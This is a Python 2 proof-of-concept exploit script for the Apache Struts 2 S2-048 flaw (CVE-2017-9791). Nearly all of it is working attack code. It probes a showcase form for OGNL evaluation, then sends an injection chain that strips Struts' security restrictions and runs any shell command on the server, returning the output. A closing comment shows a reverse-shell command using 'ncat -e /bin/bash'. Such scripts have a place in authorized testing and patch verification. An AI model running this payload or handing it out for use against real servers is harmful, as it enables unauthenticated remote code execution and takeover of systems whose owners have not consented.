#!/usr/bin/python
# -*- coding: utf-8 -*-
# Proof-of-concept exploit for CVE-2017-9791 (Apache Struts 2 S2-048).
# Python 2 only (urllib2/httplib). Use only against systems you are authorized to test.
import logging
import urllib2
import urllib
import httplib
# Bare messages only (no timestamp/level prefix); INFO and above are shown.
LOG_FORMAT = "%(message)s"
logging.basicConfig(format=LOG_FORMAT, level=logging.INFO)
log = logging.getLogger(__name__)
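def check(url):
    """Probe *url* for S2-048 OGNL evaluation without running a command.

    Sends ``%{'aaaa…' + 'bbbb…'}`` in the vulnerable form field. A server
    that evaluates the expression echoes the two halves joined together;
    a server that merely reflects the input echoes them separated by
    ``' + '``, so searching for the joined marker does not false-positive
    on plain reflection.

    Args:
        url: Target action URL (e.g. the showcase ``saveGangster.action``).

    Returns:
        True only when the request returned HTTP 200 and the body contains
        the joined marker; False otherwise, including on any request error
        (which ``send_payload_request`` logs and maps to ``None``).
    """
    left = "a" * 16
    right = "b" * 16
    marker = left + right
    # OGNL string concatenation; the quotes keep the halves apart on the wire.
    payload = "%%{'%s' + '%s'}" % (left, right)
    response = send_payload_request(url, payload)
    if not response or response.code != 200:
        return False
    try:
        return marker in response.read()
    finally:
        # Release the connection; the original left the response open.
        response.close()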
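def exploit(url, cmd):
    """Run *cmd* on the target via S2-048 and log its output.

    The target is verified with :func:`check` first, so the RCE payload is
    only sent to a host that evaluated the harmless probe.

    Args:
        url: Target action URL.
        cmd: Shell command line. It is embedded verbatim inside a
            single-quoted OGNL string literal, so a single quote in *cmd*
            breaks the expression (no escaping is attempted). If *cmd*
            never exits (e.g. the reverse-shell example at the bottom of
            this file), the server-side ``IOUtils.copy`` presumably never
            finishes and this call blocks until the connection drops.

    Raises:
        AssertionError: if :func:`check` reports the target as not
            vulnerable. Raised explicitly rather than via ``assert`` so the
            guard is not stripped when Python runs with ``-O``.
    """
    if not check(url):
        raise AssertionError("not vulnerable")
    log.info("[+] status: %s - vulnerable to Apache Struts2 S2-048", url)
    log.info("[+] execmd: %s", cmd)
    # OGNL chain: (1) if #_memberAccess is reachable, replace it with
    # DEFAULT_MEMBER_ACCESS; otherwise fetch the container, obtain OgnlUtil,
    # clear its excluded package/class lists and set member access via
    # #context. (2) pick cmd.exe or /bin/bash from os.name, start the
    # command with ProcessBuilder (stderr merged into stdout) and copy its
    # output straight into the servlet response body.
    # A simpler Runtime.exec variant (no output returned) also works; it was
    # dropped here in favour of the ProcessBuilder one.
    pieces = (
        "%{(#_='multipart/form-data').",
        "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).",
        "(#_memberAccess?(#_memberAccess=#dm):",
        "((#container=#context['com.opensymphony.xwork2.ActionContext.container']).",
        "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).",
        "(#ognlUtil.getExcludedPackageNames().clear()).",
        "(#ognlUtil.getExcludedClasses().clear()).",
        "(#context.setMemberAccess(#dm)))).",
        "(#cmd='%s')." % cmd,
        "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).",
        "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).",
        "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).",
        "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
    )
    payload = "".join(pieces)
    try:
        response = send_payload_request(url, payload)
        if response and response.code == 200:
            log.info("[+] execute : %s\n%s", cmd, response.read())
    except httplib.IncompleteRead as err:
        # The command output may be cut off without a proper terminator;
        # whatever arrived is still worth showing.
        log.info(err.partial)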
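def send_payload_request(url, payload, timeout=None):
    """POST *payload* to *url* as the showcase gangster form; return the response.

    The OGNL expression is placed in the ``name`` field; ``age``,
    ``__checkbox_bustedBefore`` and ``description`` are fixed filler,
    presumably so the showcase form accepts the submission.

    Args:
        url: Target action URL.
        payload: OGNL expression (``%{...}``) to send in ``name``.
        timeout: Optional socket timeout in seconds. ``None`` (the default)
            keeps urllib2's global default, i.e. the request may block
            indefinitely — pass a value when scanning many hosts.

    Returns:
        The ``urllib2`` response object (the caller reads and closes it), or
        ``None`` if the request raised; the error is logged with traceback.
    """
    form = {
        "name": payload,
        "age": 20,
        "__checkbox_bustedBefore": "true",
        "description": 1,
    }
    # Only forward timeout when given, so the default path is the same
    # urlopen(url, data) call as before.
    extra = {} if timeout is None else {"timeout": timeout}
    try:
        return urllib2.urlopen(url, urllib.urlencode(form), **extra)
    except Exception as err:
        # Boundary: log and let the caller treat None as "request failed".
        log.exception("%s - %s", url, str(err))
        return None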
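if __name__ == '__main__':
    import sys
    if len(sys.argv) != 3:
        print("python %s <url> <cmd>" % sys.argv[0])
        # Usage error: exit non-zero so shell wrappers can detect it.
        sys.exit(1)
    log.info('[*] name : exploit Apache Struts2 S2-048')
    url = sys.argv[1]
    cmd = sys.argv[2]
    try:
        exploit(url, cmd)
    except AssertionError as err:
        # check() said the target is not vulnerable; report without a traceback.
        log.error("[-] %s - %s", url, err)
        sys.exit(1)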
# $ ncat -v -l -p 4444 &
# $ python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"
## References
# https://cwiki.apache.org/confluence/display/WW/S2-048
# http://bobao.360.cn/news/detail/4219.html
# http://fisheye.apache.org:8060/browse/struts/apps/showcase/src/main/java/org/apache/struts2/showcase/integration/SaveGangsterAction.java?r1=59f4f31a7f3800a540c168abc67b8800db3f2f97&r2=73da12e723c2737bd515946588ddcd898acf584a
# https://github.com/Loneyers/vuldocker/tree/master/struts2/s2-048